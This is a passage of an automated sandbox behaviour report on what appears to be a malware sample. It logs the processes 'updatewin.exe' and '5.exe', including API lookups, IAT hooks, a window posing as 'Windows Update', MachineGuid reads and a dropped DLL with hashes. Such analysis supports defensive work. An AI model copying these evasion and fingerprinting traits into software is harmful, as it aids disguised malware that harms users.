Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Process #9: updatewin.exe
Information Value
ID #9
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:40, Reason: Child Process
Unmonitor End Time: 00:04:44, Reason: Terminated by Timeout
Monitor Duration 00:03:04
OS Process Information
Information Value
PID 0x4a4
Parent PID 0x2c8 (c:\users\5p5nrgjn0js halpmcxz\desktop\eb54.tmp.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x508
0x854
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
updatewin.exe 0x00400000 0x0044DFFF Relevant Image - 32-bit - False False
buffer 0x00555000 0x00555FFF Marked Executable - 32-bit - False False
Hook Information
Type: IAT
Installer: private_0x0000000000540000:+0x16785
Target: 90. entry of updatewin.exe (4 bytes)
Information: kernel32.dll:QueryPerformanceCounter+0x0 now points to pagefile_0x0000000000960000:+0x6a0000

Type: IAT
Installer: private_0x0000000000540000:+0x16785
Target: 121. entry of updatewin.exe (4 bytes)
Information: user32.dll:CallMsgFilterW+0x0 now points to pagefile_0x0000000000960000:+0x6a0000
Host Behavior
File (6)
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Module (169)
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load USER32.dll base_address = 0x74f40000 True 1
Fn
Load GDI32.dll base_address = 0x75ad0000 True 1
Fn
Load COMCTL32.dll base_address = 0x74820000 True 1
Fn
Load WINMM.dll base_address = 0x74af0000 True 1
Fn
Load msvcr100.dll base_address = 0x749c0000 True 1
Fn
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x76c20000 True 2
Fn
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 2
Fn
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 11
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin.exe, size = 260 True 1
Fn
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 8
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x76c31700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x76c334d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetDesktopWindow, address_out = 0x74f60a19 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = InvalidateRect, address_out = 0x74f61381 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfW, address_out = 0x74f7e061 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DrawIcon, address_out = 0x74f68deb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = FillRect, address_out = 0x74f60eb6 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x74f59679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetDlgItem, address_out = 0x74f7f1ba True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x74f59abb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x74f61341 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x74f61361 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x771625dd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x74f59a55 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DialogBoxParamW, address_out = 0x74f7cfca True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MoveWindow, address_out = 0x74f63698 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetClientRect, address_out = 0x74f60c62 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateDialogParamW, address_out = 0x74f810dc True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x74f63559 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x74f60dfb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetWindowPos, address_out = 0x74f58e4e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x74f58a29 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x74f5b17d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x74f588f7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x74f5787b True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x74f57809 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateAcceleratorW, address_out = 0x74f61246 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x74f578e2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadAcceleratorsW, address_out = 0x74f64dd6 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadStringW, address_out = 0x74f58eb9 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadIconW, address_out = 0x74f5b142 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMonitorInfoW, address_out = 0x74f63000 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MonitorFromWindow, address_out = 0x74f63150 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = TextOutW, address_out = 0x75aed41c True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetBkMode, address_out = 0x75ae51a2 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SelectObject, address_out = 0x75ae4f70 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateFontW, address_out = 0x75aeb600 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = DeleteObject, address_out = 0x75ae5689 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateSolidBrush, address_out = 0x75ae4f17 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetTextAlign, address_out = 0x75ae8401 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll function = InitCommonControlsEx, address_out = 0x748409ce True 1
Fn
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x74af26e0 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Window (1)
Operation Window Name Additional Information Success Count
Create Windows Update class_name = WINDOWSUPDATE, wndproc_parameter = 0 True 1
System (266)
Operation Additional Information Success Count
Sleep duration = 1000 milliseconds (1.000 seconds) True 10
Get Time type = System Time, time = 2019-05-13 17:22:59 (UTC) True 1
Get Time type = Ticks, time = 159479 True 1
Get Time type = Performance Ctr, time = 22089751189 True 1
Get Time type = Ticks, time = 159838 True 1
Get Time type = System Time True 249
Get Time type = System Time, time = 2019-05-13 17:23:01 (UTC) True 1
Get Time type = Performance Ctr, time = 22257650376 True 1
Get Info type = Operating System True 1
Environment (2)
Operation Additional Information Success Count
Get Environment String - True 2
Process #10: 5.exe
Information Value
ID #10
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\5.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\5.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:41, Reason: Child Process
Unmonitor End Time: 00:04:44, Reason: Terminated by Timeout
Monitor Duration 00:03:03
OS Process Information
Information Value
PID 0x874
Parent PID 0x2c8 (c:\users\5p5nrgjn0js halpmcxz\desktop\eb54.tmp.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0x870, 0x810, 0x80C, 0x808, 0x804, 0x648, 0x59C, 0x5D0
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
buffer 0x01B1C1F0 0x01B3195F Marked Executable - 32-bit - False False
buffer 0x01B1C1F0 0x01B3195F Content Changed - 32-bit 0x01B1D004, 0x01B1C1F0 False False
Dropped Files
Filename File Size Hash Values YARA Match
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-console-l1-1-0.dll 18.30 KB
MD5: 502263c56f931df8440d7fd2fa7b7c00
SHA1: 523a3d7c3f4491e67fc710575d8e23314db2c1a2
SHA256: 94a5df1227818edbfd0d5091c6a48f86b4117c38550343f780c604eee1cd6231
SSDeep: 192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS
YARA Match False
Host Behavior
File (6)
Operation Filename Additional Information Success Count
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-console-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create Directory C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\ - True 1
Open STD_INPUT_HANDLE - True 1
Open STD_OUTPUT_HANDLE - True 1
Open STD_ERROR_HANDLE - True 1
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-console-l1-1-0.dll size = 18744 True 1
Registry (10)
Operation Key Additional Information Success Count
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography value_name = MachineGuid, data = 0303d5b4-ffe9-470e-9dd8-7d9ec416e53f, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductName, data = Windows 7 Professional, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography value_name = MachineGuid, data = 0303d5b4-ffe9-470e-9dd8-7d9ec416e53f, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductName, data = Windows 7 Professional, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductName, data = Windows 7 Professional, type = REG_SZ True 1
Module (405)
Operation Module Additional Information Success Count
Load KERNEL32.DLL base_address = 0x76c20000 True 1
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Load GDI32.dll base_address = 0x75ad0000 True 1
Load ole32.dll base_address = 0x755e0000 True 4
Load SHELL32.dll base_address = 0x75fd0000 True 1
Load USER32.dll base_address = 0x74f40000 True 1
Load WINHTTP.dll base_address = 0x73660000 True 1
Load WINSPOOL.DRV base_address = 0x735b0000 True 1
Load kernel32.dll base_address = 0x76c20000 True 5
Load user32.dll base_address = 0x74f40000 True 3
Load advapi32.dll base_address = 0x74d40000 True 3
Load oleaut32.dll base_address = 0x75220000 True 1
Load gdi32.dll base_address = 0x75ad0000 True 1
Load msvcr100.dll base_address = 0x749c0000 True 1
Load crypt32.dll base_address = 0x759b0000 True 1
Load crtdll.dll base_address = 0x6c240000 True 1
Load Gdiplus.dll base_address = 0x72c90000 True 7
Load shell32.dll base_address = 0x75fd0000 True 1
Load ntdll.dll base_address = 0x77130000 True 1
Load wininet.dll base_address = 0x753d0000 True 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 13
Get Handle c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\5.exe base_address = 0x400000 True 1
Get Handle wininet.dll base_address = 0x0 False 1
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\5.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\5.exe, size = 260 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetVolumeMountPointA, address_out = 0x76cbc2b1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCursorPosition, address_out = 0x76cd7adf True 1
Get Address c:\windows\syswow64\kernel32.dll function = LocalReAlloc, address_out = 0x76c359bf True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x76c31700 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetNamedPipeHandleStateW, address_out = 0x76cb197c True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoA, address_out = 0x76c30e00 True 2
Get Address c:\windows\syswow64\kernel32.dll function = OpenMutexW, address_out = 0x76c35151 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLongPathNameW, address_out = 0x76c3a315 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 2
Get Address c:\windows\syswow64\kernel32.dll function = CreateNamedPipeA, address_out = 0x76cb1807 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileA, address_out = 0x76c558e5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GlobalGetAtomNameA, address_out = 0x76ca95b4 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCommMask, address_out = 0x76cb6bcd True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x76c31245 True 3
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 2
Get Address c:\windows\syswow64\kernel32.dll function = PurgeComm, address_out = 0x76cb70f6 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentDirectoryA, address_out = 0x76c5d4f6 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfoExA, address_out = 0x76cc5a1f True 1
Get Address c:\windows\syswow64\kernel32.dll function = DuplicateHandle, address_out = 0x76c31886 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteFileEx, address_out = 0x76cb45ef True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstVolumeW, address_out = 0x76cb429f True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetVolumeInformationW, address_out = 0x76c4c860 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x76c3588e True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetWaitableTimer, address_out = 0x76c5bb2f True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x76c317d1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleOutputCP, address_out = 0x76c49b0f True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleA, address_out = 0x76c312fc True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 2
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoA, address_out = 0x76c4d5e5 True 3
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeA, address_out = 0x76c58266 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringA, address_out = 0x76c5bc39 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 2
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetPriorityClass, address_out = 0x76cb438f True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleCount, address_out = 0x76c3cb29 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimes, address_out = 0x76cb358d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCommConfig, address_out = 0x76cb80c1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetTapeParameters, address_out = 0x76cbd368 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCommProperties, address_out = 0x76cb6cdf True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x76c3dd0e True 2
Get Address c:\windows\syswow64\kernel32.dll function = FindCloseChangeNotification, address_out = 0x76c4efd4 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetNamedPipeHandleStateA, address_out = 0x76cb1e79 True 1
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentActCtx, address_out = 0x76c4d551 True 1
Get Address c:\windows\syswow64\kernel32.dll function = EndUpdateResourceW, address_out = 0x76cc3ace True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 3
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SystemTimeToTzSpecificLocalTime, address_out = 0x76c50652 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GlobalCompact, address_out = 0x76caefc6 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleInputW, address_out = 0x76cd7004 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateTimerQueue, address_out = 0x76c5b020 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetupComm, address_out = 0x76cb6a07 True 1
Get Address c:\windows\syswow64\kernel32.dll function = UnregisterWait, address_out = 0x76cbe6ab True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFullPathNameW, address_out = 0x76c340d4 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetPrivateProfileSectionNamesW, address_out = 0x76caa1ea True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameA, address_out = 0x76c4b6e0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x76c349d7 True 3
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 2
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 2
